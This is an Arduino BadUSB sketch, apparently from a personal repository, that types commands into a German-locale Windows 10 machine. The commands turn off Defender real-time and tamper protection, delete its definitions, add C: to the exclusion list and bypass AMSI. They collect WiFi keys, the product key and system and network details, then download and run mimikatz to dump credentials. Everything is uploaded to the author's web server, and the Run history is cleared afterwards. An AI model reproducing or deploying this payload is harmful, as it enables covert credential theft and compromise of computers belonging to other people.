Dominic Reich
7bdf4dc91b
Arduino.mk was taken from https://github.com/sudar/Arduino-Makefile and installed into /usr/share/arduino/makefile (https://repo.oe7drt.net/dominic/Arduino-Makefile)
/* badusb.ino
 * Author: Dominic Reich (OE7DRT), dominic@oe7drt.com
 * Created November 25th, 2023
 * Last modified: 2024-12-24T08:58:01+0100 on Arch [Odin] X1
 *
 * Waits 15 seconds after being plugged in, then starts to remove the antivirus
 * definitions of Windows Defender and disables monitoring. Right after that it
 * disables Anti-Tampering in the Windows-Security GUI.
 * The script collects some useful information about the computer, its
 * network and the currently active routes as well as listening ports and
 * its processes. It also saves (if possible) the product key as well as
 * saved WiFi networks. Finally it launches mimikatz, dumps Windows
 * secrets and uploads everything to my webserver via HTTP POST.
 * It then removes the run history (Win+R) and closes the terminal window.
 *
 * Based on the examples from
 * https://www.instructables.com/A-BadUSB-Device-With-Arduino/
 *
 * The following times are outdated, as I added some commands which take
 * a few seconds each:
 * Time until I have everything on my server: ~42 sec
 * Time until the script finished locally: ~49 sec
 * Time until execution starts (waiting time): 15 sec
 */
#include <Keyboard.h>
#define KEY_DELAY 50 //delay between keystrokes for slow computers
void disableTampering() {
  /*
   * Switches off Windows Defender tamper protection through the Windows
   * Security GUI on Windows 10, using nothing but emulated keystrokes and
   * fixed delays: Win+R, the "windowsdefender:" URI, maximize the window,
   * then walk the "Viren- und Bedrohungsschutz" page with TAB/SPACE/ENTER to
   * turn off four settings, and close the window with ALT+F4.
   *
   * Assumes a German-locale Windows 10 UI (see the labels in the comments
   * below and the ALT+j confirmation) and that the hard-coded delays suit the
   * host. The TAB counts are tied to that exact layout; a different locale,
   * window size or UI version most likely desynchronises the whole sequence
   * without any feedback to the board.
   *
   * Tested on my Lenovo T420 running Windows 10 {VERSION}
   */

  // Win+R opens the Run dialog
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(700);

  // URI handler for the Windows Security app
  Keyboard.println("windowsdefender:");
  delay(3000);

  // maximize window (ALT+SPACE, then 'x') because on small screens the focus of the button changes
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(' ');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(200);
  Keyboard.press('x');
  delay(KEY_DELAY);
  Keyboard.release('x');
  delay(400);

  // "Viren- und Bedrohungsschutz" (Virus & threat protection) is focused: just hit ENTER
  Keyboard.press(KEY_RETURN);
  delay(KEY_DELAY);
  Keyboard.release(KEY_RETURN);
  delay(1400);

  // four TABs down to "Einstellungen verwalten" (Manage settings), then ENTER
  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_RETURN);
  delay(KEY_DELAY);
  Keyboard.release(KEY_RETURN);
  delay(1400);

  // toggle "Echtzeitschutz" (Real-time protection) off with SPACE
  Keyboard.press(' ');
  delay(KEY_DELAY);
  Keyboard.release(' ');
  delay(1400);

  // confirm the UAC prompt with ALT+j (presumably "Ja" on the German dialog)
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press('j');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(1400);

  // three TABs down to the "Cloudbasierter Schutz" (Cloud-delivered protection) slider, then SPACE
  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(' ');
  delay(KEY_DELAY);
  Keyboard.release(' ');
  delay(1400);

  // one TAB to "Automatische Übermittlung von Beispielen" (Automatic sample submission), then SPACE
  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(' ');
  delay(KEY_DELAY);
  Keyboard.release(' ');
  delay(1400);

  // two TABs to "Manipulationsschutz" (Tamper protection), then SPACE
  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(' ');
  delay(KEY_DELAY);
  Keyboard.release(' ');
  delay(1400);

  // close the Windows Security window with ALT+F4
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(700);
}
void setup() {
  /*
   * Arduino entry point; runs once after the board enumerates as a USB HID
   * keyboard. After the 15 s grace period it calls disableTampering() and then
   * types the cmd/PowerShell command sequence summarised in the file header,
   * one line at a time with fixed delays, before releasing the keyboard with
   * Keyboard.end(). Everything below is plain typed input: the board gets no
   * feedback from the host, so every step relies on the delays being long
   * enough and on the expected window having focus.
   */

  // Keyboard.begin();
  // de_DE layout: the emitted keycodes must match the host's keyboard layout,
  // otherwise punctuation in the typed commands ends up wrong
  Keyboard.begin(KeyboardLayout_de_DE);
  // I recommend that you leave a short delay before start while prototyping.
  // It will give you some time to reprogram a board before it starts typing.
  delay(15000);

  // normal program, only run it once at startup

  disableTampering();

  // Windows + R
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(900);

  // Start cmd as Administrator
  Keyboard.println("powershell Start-Process cmd -Verb runAs");
  delay(4600);

  // press ALT + j to confirm execution as Administrator
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press('j');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(1700);

  // If no UAC enabled, we printed j on the console, let's
  // initiate a few CTRL+C's to cancel that and get a fresh
  // prompt...
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press('c');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(100);

  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press('c');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(100);

  // Disable Defender; wait a bit longer, because recent only `ershell ...` was printed
  Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true");
  delay(400);

  // Start powershell; wait longer because the OS has to bring another window to foreground
  Keyboard.println("powershell");
  delay(2600);

  // Add C: to Defender exclusion list
  Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\"");
  delay(400);

  Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\"");
  delay(400);

  // get some information about the network; everything is written into
  // %UserProfile%\tmp, which is posted and deleted further down
  Keyboard.println("cd $ENV:UserProfile");
  delay(400);

  Keyboard.println("New-Item -Name \"tmp\" -Type Directory -Force");
  delay(100);
  Keyboard.println("cd tmp");
  delay(100);

  Keyboard.println("netsh wlan export profile key=clear");
  delay(400);

  Keyboard.println("ipconfig /all > ipc.txt");
  delay(400);

  Keyboard.println("netstat -rn > nr.txt");
  delay(400);
  Keyboard.println("netstat -anb >> nr.txt");
  delay(400);

  // systeminfo and Get-ComputerInfo are slow, hence the longer waits
  Keyboard.println("systeminfo > pc.txt");
  delay(4600);

  Keyboard.println("Get-ComputerInfo > pspc.txt");
  delay(4600);

  Keyboard.println("Reg export \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform\" prodkey.txt /y");
  delay(400);

  // A former plain-text FTP upload path (windows ftp does not know about passive ftp)
  // was kept here as commented-out code including hard-coded credentials; removed
  // because dead code must not carry secrets. The HTTP POST below replaces it.

  // Keyboard.println("((sc -NoNewLine -Encoding Ascii .\\Report.txt -Value(gc *.*) -join """`n""") + """`n""")");
  // delay(KEY_DELAY);
  // Keyboard.println("$report=gc .\\Report.txt");
  Keyboard.println("$report=gc -Encoding utf8 -Delimiter \"'n\" *.*");
  delay(400);

  Keyboard.println("(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/rx-net.php',$report)");
  delay(2200);

  Keyboard.println("cd ..");
  delay(400);

  Keyboard.println("Remove-Item -Recurse -Force tmp");
  delay(400);

  // exit powershell (because the next commands have to run in a separated powershell process)
  Keyboard.println("exit");
  delay(2200);

  // Download and execute mimikatz; then upload result log
  Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\"");
  // Keyboard.println("IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)");
  delay(9000);

  // Clear run history
  Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
  // Keyboard.println("Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue");
  delay(400);

  // show wlan passwords
  // Keyboard.println("netsh wlan show profile key=clear");
  // delay(8000);

  // exit cmd window
  Keyboard.println("exit");
  delay(KEY_DELAY);

  // release the HID keyboard; nothing else is typed after this point
  Keyboard.end();
}
void loop() {
  // Intentionally empty: the sketch is one-shot and everything runs from setup().
  // do nothing in loop() -- or should we restart the computer? or lock it? or delete something?
  // or start a fork bomb etc...
}